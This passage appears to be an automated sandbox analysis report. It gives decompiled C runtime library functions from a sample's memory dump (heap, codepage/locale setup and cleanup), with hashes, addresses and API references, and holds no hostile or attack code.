                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 636fdedc6b6670a1341c5b2cc5ba339d8395d83823908c313b7007aebb73c50c
                                                • Instruction ID: c3520f444cfcd01e865ea72cb7d4c815387fd001026230c7ffe25f277dcde347
                                                • Opcode Fuzzy Hash: 636fdedc6b6670a1341c5b2cc5ba339d8395d83823908c313b7007aebb73c50c
                                                • Instruction Fuzzy Hash: 72E04F32541A28FBCF166F61EC04FAF7F1AEF44B60F044010FD156A561DB729D21AAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C2D9C0() {
                                                				signed int _t3;
                                                
                                                				_t3 = GetProcessHeap();
                                                				 *0xc99824 = _t3;
                                                				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                			}




                                                0x00c2d9c0
                                                0x00c2d9c8
                                                0x00c2d9d0

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: a8408eeb7a8b159c33a6bdc2a1329aaf69bb89cf17756117648e0b06f54067f4
                                                • Instruction ID: c314605d4c1008b87706fc6e97d90e885712879f85e6c095beebbe2f0ea344d9
                                                • Opcode Fuzzy Hash: a8408eeb7a8b159c33a6bdc2a1329aaf69bb89cf17756117648e0b06f54067f4
                                                • Instruction Fuzzy Hash: 8FA02230302200CF83008F38AF0C30C3AFCEA0E2C2B08002EA008C00B0EB308080AB0A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C2B3BA(void* __ecx) {
                                                				char _v8;
                                                				intOrPtr _t7;
                                                				char _t13;
                                                
                                                				_t13 = 0;
                                                				_v8 = 0;
                                                				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                				_t16 =  *((intOrPtr*)(_t7 + 8));
                                                				if( *((intOrPtr*)(_t7 + 8)) < 0) {
                                                					L2:
                                                					_t13 = 1;
                                                				} else {
                                                					E00C25554(_t16,  &_v8);
                                                					if(_v8 != 1) {
                                                						goto L2;
                                                					}
                                                				}
                                                				return _t13;
                                                			}






                                                0x00c2b3c7
                                                0x00c2b3c9
                                                0x00c2b3cc
                                                0x00c2b3cf
                                                0x00c2b3d2
                                                0x00c2b3e3
                                                0x00c2b3e5
                                                0x00c2b3d4
                                                0x00c2b3d8
                                                0x00c2b3e1
                                                0x00000000
                                                0x00000000
                                                0x00c2b3e1
                                                0x00c2b3ea

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba304f616726d60eece82a44b466d52df3b96b528a09c416e34cadee7ffdbc6c
                                                • Instruction ID: 9e85d00bf85128fd6af7d896caafe92b400251278c87515a3c80870cbf0dc139
                                                • Opcode Fuzzy Hash: ba304f616726d60eece82a44b466d52df3b96b528a09c416e34cadee7ffdbc6c
                                                • Instruction Fuzzy Hash: 9AE08C72915238EBCB15DBCCE98498AF3ECEB44B00B1140A6F601E3511C770DE00D7D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E00C1F47E(void* __edx, intOrPtr* _a4) {
                                                				signed int _v8;
                                                				char _v22;
                                                				struct _cpinfo _v28;
                                                				void* _v32;
                                                				void* _v36;
                                                				void* _v40;
                                                				void* _v44;
                                                				void* _v48;
                                                				void* _v52;
                                                				intOrPtr* _v56;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int* _v68;
                                                				intOrPtr _v72;
                                                				signed int* _v76;
                                                				signed int** _v80;
                                                				signed int** _v84;
                                                				void* _v88;
                                                				char _v92;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t126;
                                                				signed int* _t129;
                                                				intOrPtr* _t131;
                                                				signed int* _t147;
                                                				signed short _t150;
                                                				signed int _t151;
                                                				void* _t153;
                                                				void* _t156;
                                                				void* _t159;
                                                				void* _t160;
                                                				void* _t164;
                                                				signed int _t165;
                                                				signed int* _t166;
                                                				signed char _t183;
                                                				signed int* _t186;
                                                				void* _t190;
                                                				char _t195;
                                                				signed char _t197;
                                                				void* _t204;
                                                				signed int* _t205;
                                                				void* _t207;
                                                				signed int* _t209;
                                                				void* _t212;
                                                				intOrPtr _t213;
                                                				intOrPtr _t217;
                                                				signed int* _t221;
                                                				intOrPtr _t222;
                                                				signed int _t223;
                                                				void* _t227;
                                                				signed int _t230;
                                                				char* _t231;
                                                				intOrPtr _t232;
                                                				signed int* _t235;
                                                				signed char* _t236;
                                                				signed int** _t239;
                                                				signed int** _t240;
                                                				signed char* _t249;
                                                				void* _t251;
                                                				intOrPtr* _t252;
                                                				void* _t255;
                                                				signed int _t256;
                                                				short* _t257;
                                                				signed int _t260;
                                                				signed int _t261;
                                                				void* _t262;
                                                				void* _t263;
                                                
                                                				_t233 = __edx;
                                                				_t126 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t126 ^ _t261;
                                                				_t252 = _a4;
                                                				_t205 = 0;
                                                				_v56 = _t252;
                                                				_t237 = 0;
                                                				_v32 = 0;
                                                				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
                                                				_v36 = 0;
                                                				_v40 = 0;
                                                				_v92 = _t252;
                                                				_v88 = 0;
                                                				if(_t213 == 0) {
                                                					__eflags =  *(_t252 + 0x8c);
                                                					if( *(_t252 + 0x8c) != 0) {
                                                						asm("lock dec dword [eax]");
                                                					}
                                                					 *(_t252 + 0x8c) = _t205;
                                                					_t129 = 0;
                                                					__eflags = 0;
                                                					 *(_t252 + 0x90) = _t205;
                                                					 *_t252 = 0xc36248;
                                                					 *(_t252 + 0x94) = 0xc364c8;
                                                					 *(_t252 + 0x98) = 0xc36648;
                                                					 *(_t252 + 4) = 1;
                                                					L48:
                                                					return E00C17193(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
                                                				}
                                                				_t131 = _t252 + 8;
                                                				_v52 = 0;
                                                				if( *_t131 != 0) {
                                                					L3:
                                                					_v52 = E00C22F42(1, 4);
                                                					E00C22F9F(_t205);
                                                					_v32 = E00C22F42(0x180, 2);
                                                					E00C22F9F(_t205);
                                                					_t237 = E00C22F42(0x180, 1);
                                                					_v44 = _t237;
                                                					E00C22F9F(_t205);
                                                					_v36 = E00C22F42(0x180, 1);
                                                					E00C22F9F(_t205);
                                                					_v40 = E00C22F42(0x101, 1);
                                                					E00C22F9F(_t205);
                                                					_t263 = _t262 + 0x3c;
                                                					if(_v52 == _t205 || _v32 == _t205) {
                                                						L43:
                                                						E00C22F9F(_v52);
                                                						E00C22F9F(_v32);
                                                						E00C22F9F(_t237);
                                                						E00C22F9F(_v36);
                                                						_t205 = 1;
                                                						__eflags = 1;
                                                						goto L44;
                                                					} else {
                                                						_t217 = _v40;
                                                						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
                                                							goto L43;
                                                						} else {
                                                							_t147 = _t205;
                                                							do {
                                                								 *(_t147 + _t217) = _t147;
                                                								_t147 =  &(_t147[0]);
                                                							} while (_t147 < 0x100);
                                                							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
                                                								goto L43;
                                                							}
                                                							_t150 = _v28;
                                                							if(_t150 > 5) {
                                                								goto L43;
                                                							}
                                                							_t151 = _t150 & 0x0000ffff;
                                                							_v60 = _t151;
                                                							if(_t151 <= 1) {
                                                								L22:
                                                								_t37 = _t237 + 0x81; // 0x81
                                                								_t233 = 0xff;
                                                								_v48 = _v40 + 1;
                                                								_t153 = E00C28318(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
                                                								_t263 = _t263 + 0x24;
                                                								_t282 = _t153;
                                                								if(_t153 == 0) {
                                                									goto L43;
                                                								}
                                                								_t156 = E00C28318(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
                                                								_t263 = _t263 + 0x24;
                                                								_t283 = _t156;
                                                								if(_t156 == 0) {
                                                									goto L43;
                                                								}
                                                								_v72 = _v32 + 0x100;
                                                								_t159 = E00C2802B(_t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
                                                								_t263 = _t263 + 0x1c;
                                                								if(_t159 == 0) {
                                                									goto L43;
                                                								}
                                                								_t160 = _v32;
                                                								_t221 = _t160 + 0xfe;
                                                								 *_t221 = 0;
                                                								_t233 = _v44;
                                                								_v76 = _t221;
                                                								_t222 = _v36;
                                                								_t239 = _t233 + 0x80;
                                                								 *(_t233 + 0x7f) = _t205;
                                                								_v80 = _t239;
                                                								 *(_t222 + 0x7f) = _t205;
                                                								 *_t239 = _t205;
                                                								_t240 = _t222 + 0x80;
                                                								_v84 = _t240;
                                                								 *_t240 = _t205;
                                                								if(_v60 <= 1) {
                                                									L39:
                                                									_t223 = 0x3f;
                                                									_push(0x1f);
                                                									memcpy(_v32, _v32 + 0x200, _t223 << 2);
                                                									asm("movsw");
                                                									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
                                                									_t227 = 0x1f;
                                                									asm("movsw");
                                                									asm("movsb");
                                                									_t255 = _t164 + 0x100;
                                                									_t165 = memcpy(_t164, _t255, 0 << 2);
                                                									_t237 = _t255 + _t227 + _t227;
                                                									asm("movsw");
                                                									asm("movsb");
                                                									_t252 = _v56;
                                                									if( *(_t252 + 0x8c) != 0) {
                                                										asm("lock xadd [ecx], eax");
                                                										if((_t165 | 0xffffffff) == 0) {
                                                											E00C22F9F( *(_t252 + 0x90) - 0xfe);
                                                											_t237 = 0x80;
                                                											E00C22F9F( *(_t252 + 0x94) - 0x80);
                                                											E00C22F9F( *(_t252 + 0x98) - 0x80);
                                                											E00C22F9F( *(_t252 + 0x8c));
                                                										}
                                                									}
                                                									_t166 = _v52;
                                                									 *_t166 = 1;
                                                									 *(_t252 + 0x8c) = _t166;
                                                									 *_t252 = _v72;
                                                									 *(_t252 + 0x90) = _v76;
                                                									 *(_t252 + 0x94) = _v80;
                                                									 *(_t252 + 0x98) = _v84;
                                                									 *(_t252 + 4) = _v60;
                                                									L44:
                                                									E00C22F9F(_v40);
                                                									_t129 = _t205;
                                                									goto L48;
                                                								}
                                                								if( *(_t252 + 8) != 0xfde9) {
                                                									_t249 =  &_v22;
                                                									__eflags = _v22 - _t205;
                                                									if(_v22 == _t205) {
                                                										goto L39;
                                                									}
                                                									_t207 = _v32;
                                                									while(1) {
                                                										_t183 = _t249[1];
                                                										__eflags = _t183;
                                                										if(_t183 == 0) {
                                                											break;
                                                										}
                                                										_t256 =  *_t249 & 0x000000ff;
                                                										_v64 = _t256;
                                                										__eflags = _t256 - (_t183 & 0x000000ff);
                                                										if(_t256 > (_t183 & 0x000000ff)) {
                                                											L37:
                                                											_t249 =  &(_t249[2]);
                                                											__eflags =  *_t249;
                                                											if( *_t249 != 0) {
                                                												continue;
                                                											}
                                                											break;
                                                										}
                                                										_v48 = _t233;
                                                										_t186 = _t222 + 0x80 + _t256;
                                                										_t235 = _t233 - _t222;
                                                										__eflags = _t235;
                                                										_t230 = _v64;
                                                										_t257 = _t207 - 0xffffff00 + _t256 * 2;
                                                										_v68 = _t186;
                                                										_t209 = _t186;
                                                										do {
                                                											 *_t257 = 0x8000;
                                                											_t257 = _t257 + 2;
                                                											 *(_t235 + _t209) = _t230;
                                                											 *_t209 = _t230;
                                                											_t230 = _t230 + 1;
                                                											_t209 =  &(_t209[0]);
                                                											__eflags = _t230 - (_t249[1] & 0x000000ff);
                                                										} while (_t230 <= (_t249[1] & 0x000000ff));
                                                										_t233 = _v44;
                                                										_t222 = _v36;
                                                										_t207 = _v32;
                                                										goto L37;
                                                									}
                                                									L38:
                                                									_t205 = 0;
                                                									goto L39;
                                                								}
                                                								_v44 = _t160 + 0x200;
                                                								_t231 = _t233 + 0x100;
                                                								_t251 = _t222 - _t233;
                                                								_t190 = 0xffffff80;
                                                								_v48 = _t190 - _t233;
                                                								do {
                                                									_push(0x32);
                                                									asm("sbb eax, eax");
                                                									_v44 = _v44 + 2;
                                                									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
                                                									_t212 = _v48;
                                                									_t195 = _t231 + _t212;
                                                									 *_t231 = _t195;
                                                									 *((char*)(_t251 + _t231)) = _t195;
                                                									_t231 = _t231 + 1;
                                                								} while (_t212 + _t231 <= 0xff);
                                                								goto L38;
                                                							}
                                                							_t281 =  *(_t252 + 8) - 0xfde9;
                                                							if( *(_t252 + 8) != 0xfde9) {
                                                								_t236 =  &_v22;
                                                								__eflags = _v22 - _t205;
                                                								if(__eflags == 0) {
                                                									goto L22;
                                                								}
                                                								_t232 = _v40;
                                                								while(1) {
                                                									_t197 = _t236[1];
                                                									__eflags = _t197;
                                                									if(__eflags == 0) {
                                                										break;
                                                									}
                                                									_t260 =  *_t236 & 0x000000ff;
                                                									__eflags = _t260 - (_t197 & 0x000000ff);
                                                									if(_t260 > (_t197 & 0x000000ff)) {
                                                										L20:
                                                										_t236 =  &(_t236[2]);
                                                										__eflags =  *_t236 - _t205;
                                                										if(__eflags != 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									} else {
                                                										goto L19;
                                                									}
                                                									do {
                                                										L19:
                                                										 *((char*)(_t260 + _t232)) = 0x20;
                                                										_t260 = _t260 + 1;
                                                										__eflags = _t260 - (_t236[1] & 0x000000ff);
                                                									} while (_t260 <= (_t236[1] & 0x000000ff));
                                                									goto L20;
                                                								}
                                                								_t252 = _v56;
                                                								goto L22;
                                                							}
                                                							E00C18BB0(_t237, _v40 - 0xffffff80, 0x20, 0x80);
                                                							_t263 = _t263 + 0xc;
                                                							goto L22;
                                                						}
                                                					}
                                                				}
                                                				_push(_t131);
                                                				_push(0x1004);
                                                				_push(_t213);
                                                				_push(0);
                                                				_push( &_v92);
                                                				_t204 = E00C27E7B(__edx);
                                                				_t263 = _t262 + 0x14;
                                                				if(_t204 != 0) {
                                                					goto L43;
                                                				}
                                                				goto L3;
                                                			}







































































                                                0x00c1f47e
                                                0x00c1f486
                                                0x00c1f48d
                                                0x00c1f492
                                                0x00c1f495
                                                0x00c1f498
                                                0x00c1f49b
                                                0x00c1f49d
                                                0x00c1f4a0
                                                0x00c1f4a6
                                                0x00c1f4a9
                                                0x00c1f4ac
                                                0x00c1f4af
                                                0x00c1f4b4
                                                0x00c1f897
                                                0x00c1f899
                                                0x00c1f89b
                                                0x00c1f89b
                                                0x00c1f89e
                                                0x00c1f8a4
                                                0x00c1f8a4
                                                0x00c1f8a6
                                                0x00c1f8ac
                                                0x00c1f8b2
                                                0x00c1f8bc
                                                0x00c1f8c6
                                                0x00c1f8cd
                                                0x00c1f8db
                                                0x00c1f8db
                                                0x00c1f4ba
                                                0x00c1f4bd
                                                0x00c1f4c2
                                                0x00c1f4e0
                                                0x00c1f4ea
                                                0x00c1f4ed
                                                0x00c1f500
                                                0x00c1f503
                                                0x00c1f510
                                                0x00c1f513
                                                0x00c1f516
                                                0x00c1f528
                                                0x00c1f52b
                                                0x00c1f53d
                                                0x00c1f540
                                                0x00c1f545
                                                0x00c1f54b
                                                0x00c1f860
                                                0x00c1f863
                                                0x00c1f86b
                                                0x00c1f871
                                                0x00c1f879
                                                0x00c1f883
                                                0x00c1f883
                                                0x00000000
                                                0x00c1f55a
                                                0x00c1f55a
                                                0x00c1f55f
                                                0x00000000
                                                0x00c1f576
                                                0x00c1f576
                                                0x00c1f578
                                                0x00c1f578
                                                0x00c1f57b
                                                0x00c1f57c
                                                0x00c1f592
                                                0x00000000
                                                0x00000000
                                                0x00c1f598
                                                0x00c1f59e
                                                0x00000000
                                                0x00000000
                                                0x00c1f5a4
                                                0x00c1f5a7
                                                0x00c1f5ad
                                                0x00c1f603
                                                0x00c1f606
                                                0x00c1f610
                                                0x00c1f625
                                                0x00c1f629
                                                0x00c1f62e
                                                0x00c1f631
                                                0x00c1f633
                                                0x00000000
                                                0x00000000
                                                0x00c1f65c
                                                0x00c1f661
                                                0x00c1f664
                                                0x00c1f666
                                                0x00000000
                                                0x00000000
                                                0x00c1f681
                                                0x00c1f687
                                                0x00c1f68c
                                                0x00c1f691
                                                0x00000000
                                                0x00000000
                                                0x00c1f697
                                                0x00c1f6a0
                                                0x00c1f6a6
                                                0x00c1f6a9
                                                0x00c1f6ac
                                                0x00c1f6af
                                                0x00c1f6b2
                                                0x00c1f6b8
                                                0x00c1f6bb
                                                0x00c1f6be
                                                0x00c1f6c1
                                                0x00c1f6c3
                                                0x00c1f6c9
                                                0x00c1f6cc
                                                0x00c1f6ce
                                                0x00c1f79e
                                                0x00c1f7a5
                                                0x00c1f7a6
                                                0x00c1f7b1
                                                0x00c1f7b6
                                                0x00c1f7c0
                                                0x00c1f7c2
                                                0x00c1f7c3
                                                0x00c1f7c5
                                                0x00c1f7c6
                                                0x00c1f7ce
                                                0x00c1f7ce
                                                0x00c1f7d0
                                                0x00c1f7d2
                                                0x00c1f7d3
                                                0x00c1f7de
                                                0x00c1f7e3
                                                0x00c1f7e7
                                                0x00c1f7f5
                                                0x00c1f800
                                                0x00c1f808
                                                0x00c1f816
                                                0x00c1f821
                                                0x00c1f826
                                                0x00c1f7e7
                                                0x00c1f829
                                                0x00c1f82c
                                                0x00c1f832
                                                0x00c1f83b
                                                0x00c1f840
                                                0x00c1f849
                                                0x00c1f852
                                                0x00c1f85b
                                                0x00c1f884
                                                0x00c1f887
                                                0x00c1f88d
                                                0x00000000
                                                0x00c1f88d
                                                0x00c1f6db
                                                0x00c1f734
                                                0x00c1f737
                                                0x00c1f73a
                                                0x00000000
                                                0x00000000
                                                0x00c1f73c
                                                0x00c1f73f
                                                0x00c1f73f
                                                0x00c1f742
                                                0x00c1f744
                                                0x00000000
                                                0x00000000
                                                0x00c1f746
                                                0x00c1f74c
                                                0x00c1f74f
                                                0x00c1f751
                                                0x00c1f794
                                                0x00c1f794
                                                0x00c1f797
                                                0x00c1f79a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1f79a
                                                0x00c1f759
                                                0x00c1f762
                                                0x00c1f764
                                                0x00c1f764
                                                0x00c1f766
                                                0x00c1f769
                                                0x00c1f76c
                                                0x00c1f76f
                                                0x00c1f771
                                                0x00c1f776
                                                0x00c1f779
                                                0x00c1f77c
                                                0x00c1f77f
                                                0x00c1f781
                                                0x00c1f786
                                                0x00c1f787
                                                0x00c1f787
                                                0x00c1f78b
                                                0x00c1f78e
                                                0x00c1f791
                                                0x00000000
                                                0x00c1f791
                                                0x00c1f79c
                                                0x00c1f79c
                                                0x00000000
                                                0x00c1f79c
                                                0x00c1f6e4
                                                0x00c1f6e7
                                                0x00c1f6f4
                                                0x00c1f6f6
                                                0x00c1f6fb
                                                0x00c1f6fe
                                                0x00c1f701
                                                0x00c1f709
                                                0x00c1f70b
                                                0x00c1f719
                                                0x00c1f71c
                                                0x00c1f71f
                                                0x00c1f722
                                                0x00c1f724
                                                0x00c1f727
                                                0x00c1f72b
                                                0x00000000
                                                0x00c1f732
                                                0x00c1f5af
                                                0x00c1f5b6
                                                0x00c1f5d0
                                                0x00c1f5d3
                                                0x00c1f5d6
                                                0x00000000
                                                0x00000000
                                                0x00c1f5d8
                                                0x00c1f5db
                                                0x00c1f5db
                                                0x00c1f5de
                                                0x00c1f5e0
                                                0x00000000
                                                0x00000000
                                                0x00c1f5e2
                                                0x00c1f5e8
                                                0x00c1f5ea
                                                0x00c1f5f9
                                                0x00c1f5f9
                                                0x00c1f5fc
                                                0x00c1f5fe
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1f5ec
                                                0x00c1f5ec
                                                0x00c1f5ec
                                                0x00c1f5f0
                                                0x00c1f5f5
                                                0x00c1f5f5
                                                0x00000000
                                                0x00c1f5ec
                                                0x00c1f600
                                                0x00000000
                                                0x00c1f600
                                                0x00c1f5c6
                                                0x00c1f5cb
                                                0x00000000
                                                0x00c1f5cb
                                                0x00c1f55f
                                                0x00c1f54b
                                                0x00c1f4c4
                                                0x00c1f4c5
                                                0x00c1f4ca
                                                0x00c1f4ce
                                                0x00c1f4cf
                                                0x00c1f4d0
                                                0x00c1f4d5
                                                0x00c1f4da
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$Info
                                                • String ID:
                                                • API String ID: 2509303402-0
                                                • Opcode ID: c564cca93c8a705fda92c7e3e1eb76b997fc4d1ce6cc7ff35d23428d2a6769aa
                                                • Instruction ID: efa8d88061ed109a01f1af8d8d651084060393518b75fc485467e5fac2c13541
                                                • Opcode Fuzzy Hash: c564cca93c8a705fda92c7e3e1eb76b997fc4d1ce6cc7ff35d23428d2a6769aa
                                                • Instruction Fuzzy Hash: 28D18E71D00315AFDB11DFB9C881BEEBBF5BF09300F14416DE499A7292DA70A986EB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C2C3E4(intOrPtr _a4) {
                                                				intOrPtr _v8;
                                                				intOrPtr _t25;
                                                				intOrPtr* _t26;
                                                				intOrPtr _t28;
                                                				intOrPtr* _t29;
                                                				intOrPtr* _t31;
                                                				intOrPtr* _t45;
                                                				intOrPtr* _t46;
                                                				intOrPtr* _t47;
                                                				intOrPtr* _t55;
                                                				intOrPtr* _t70;
                                                				intOrPtr _t74;
                                                
                                                				_t74 = _a4;
                                                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                				if(_t25 != 0 && _t25 != 0xc42060) {
                                                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                					if(_t45 != 0 &&  *_t45 == 0) {
                                                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                						if(_t46 != 0 &&  *_t46 == 0) {
                                                							E00C22F9F(_t46);
                                                							E00C2B690( *((intOrPtr*)(_t74 + 0x88)));
                                                						}
                                                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                						if(_t47 != 0 &&  *_t47 == 0) {
                                                							E00C22F9F(_t47);
                                                							E00C2BB44( *((intOrPtr*)(_t74 + 0x88)));
                                                						}
                                                						E00C22F9F( *((intOrPtr*)(_t74 + 0x7c)));
                                                						E00C22F9F( *((intOrPtr*)(_t74 + 0x88)));
                                                					}
                                                				}
                                                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                				if(_t26 != 0 &&  *_t26 == 0) {
                                                					E00C22F9F( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                					E00C22F9F( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                					E00C22F9F( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                					E00C22F9F( *((intOrPtr*)(_t74 + 0x8c)));
                                                				}
                                                				E00C2C555( *((intOrPtr*)(_t74 + 0x9c)));
                                                				_t28 = 6;
                                                				_t55 = _t74 + 0xa0;
                                                				_v8 = _t28;
                                                				_t70 = _t74 + 0x28;
                                                				do {
                                                					if( *((intOrPtr*)(_t70 - 8)) != 0xc42258) {
                                                						_t31 =  *_t70;
                                                						if(_t31 != 0 &&  *_t31 == 0) {
                                                							E00C22F9F(_t31);
                                                							E00C22F9F( *_t55);
                                                						}
                                                						_t28 = _v8;
                                                					}
                                                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                						if(_t29 != 0 &&  *_t29 == 0) {
                                                							E00C22F9F(_t29);
                                                						}
                                                						_t28 = _v8;
                                                					}
                                                					_t55 = _t55 + 4;
                                                					_t70 = _t70 + 0x10;
                                                					_t28 = _t28 - 1;
                                                					_v8 = _t28;
                                                				} while (_t28 != 0);
                                                				return E00C22F9F(_t74);
                                                			}















                                                0x00c2c3ec
                                                0x00c2c3f0
                                                0x00c2c3f8
                                                0x00c2c401
                                                0x00c2c406
                                                0x00c2c40d
                                                0x00c2c415
                                                0x00c2c41d
                                                0x00c2c428
                                                0x00c2c42e
                                                0x00c2c42f
                                                0x00c2c437
                                                0x00c2c43f
                                                0x00c2c44a
                                                0x00c2c450
                                                0x00c2c454
                                                0x00c2c45f
                                                0x00c2c465
                                                0x00c2c406
                                                0x00c2c466
                                                0x00c2c46e
                                                0x00c2c481
                                                0x00c2c494
                                                0x00c2c4a2
                                                0x00c2c4ad
                                                0x00c2c4b2
                                                0x00c2c4bb
                                                0x00c2c4c3
                                                0x00c2c4c4
                                                0x00c2c4ca
                                                0x00c2c4cd
                                                0x00c2c4d0
                                                0x00c2c4d7
                                                0x00c2c4d9
                                                0x00c2c4dd
                                                0x00c2c4e5
                                                0x00c2c4ec
                                                0x00c2c4f2
                                                0x00c2c4f3
                                                0x00c2c4f3
                                                0x00c2c4fa
                                                0x00c2c4fc
                                                0x00c2c501
                                                0x00c2c509
                                                0x00c2c50e
                                                0x00c2c50f
                                                0x00c2c50f
                                                0x00c2c512
                                                0x00c2c515
                                                0x00c2c518
                                                0x00c2c51b
                                                0x00c2c51b
                                                0x00c2c52b

                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 00C2C428
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B6AD
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B6BF
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B6D1
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B6E3
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B6F5
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B707
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B719
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B72B
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B73D
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B74F
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B761
